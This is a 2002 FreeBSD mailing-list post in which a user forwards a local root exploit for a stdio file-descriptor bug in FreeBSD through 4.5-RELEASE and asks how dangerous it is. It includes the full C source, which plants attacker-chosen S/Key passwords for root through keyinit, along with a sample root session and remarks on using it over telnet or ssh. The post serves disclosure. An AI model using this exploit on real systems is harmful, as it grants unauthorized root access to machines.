From owner-freebsd-current Thu Apr 25 1:23: 1 2002 Delivered-To: freebsd-current@freebsd.org Received: from gate.uai.etel.ru (gate.uai.etel.ru [195.38.57.243]) by hub.freebsd.org (Postfix) with ESMTP id 9CF5837B422 for ; Thu, 25 Apr 2002 01:22:50 -0700 (PDT) Received: by sendmail of gate.uai.etel.ru id g3P8Mp821194 for ; Thu, 25 Apr 2002 14:22:51 +0600 X-Authentication-Warning: gate.uai.etel.ru: smap set sender to using -f Received: from by gate.uai.etel.ru via smap (V2.1) id xma021012; Thu, 25 Apr 02 14:21:52 +0600 Received: by sendmail with ESMTP id g3P8Lo5H025630 from vlad@telecom.ural.ru for ; Thu, 25 Apr 2002 14:21:50 +0600 Received: by sendmail id g3P8LoWV025629 for freebsd-current@freebsd.org.KAV; Thu, 25 Apr 2002 14:21:50 +0600 Received: by sendmail with ESMTP id g3P8Ln5H025612; Thu, 25 Apr 2002 14:21:49 +0600 Date: Thu, 25 Apr 2002 14:22:10 +0600 From: "Vladimir G. Drobyshevsky" X-Mailer: The Bat! (v1.60c) UNREG / CD5BF9353B3B7091 Reply-To: "Vladimir G. Drobyshevsky" Organization: Computer saloons "TelescOp" X-Priority: 3 (Normal) Message-ID: <129604079.20020425142210@telecom.ural.ru> To: freebsd-stable@freebsd.org, freebsd-current@freebsd.org Subject: FreeBSD security hole? MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-current@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Have a nice day! Yesterday I received that message from one of linux guys: --- forward message --- /* phased/b10z phased@snosoft.com 23/04/2002 stdio kernel bug in All releases of FreeBSD up to and including 4.5-RELEASE decided to make a trivial exploit to easily get root :) > id uid=1003(phased) gid=999(phased) groups=999(phased) > ./iosmash Adding phased: <--- HIT CTRL-C ---> > su s/key 98 snosoft2 Password:MASS OAT ROLL TOOL AGO CAM xes# this program makes the following skeys valid 95: CARE LIVE CARD LOFT CHIC HILL 96: TESS OIL WELD DUD MUTE KIT 97: DADE BED DRY JAW GRAB NOV 98: MASS OAT ROLL TOOL AGO CAM 99: DARK LEW JOLT JIVE MOS WHO cheers Joost Pol */ #include #include int main(int argc, char *argv[]) { while(dup(1) != -1); close(2); execl("/usr/bin/keyinit", "\nroot 0099 snosoft2 6f648e8bd0e2988a Apr 23,2666 01:02:03\n"); } --- forward message --- He ask me to verify that information. I did. And it works. And the second message that I recived today: --- message --- phased had some comments he wanted me to forward on to the lists in regards to his latest exploit. He says that skeys are used via all authentication methods... i.e telnet, so someone could change the user to someone in the wheel group. Haven't used skeys via ssh yet but I presume it works. Root obviously can't just telnet in by default but usually can ssh, but if the box being exploited contains people in the wheel group you can change the root user in the exploit to any user to log in via skeys as that user. --- message --- I not so well understand in interiors of system, I only see, that during 30 seconds have got access to the root account (of course, from the account of the user who is included in group wheel, differently su, naturally, not gives access). Therefore I ask to comment on these messages. How dangerous can it be? -- Sincerelly yours, Vl To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-current" in the body of the message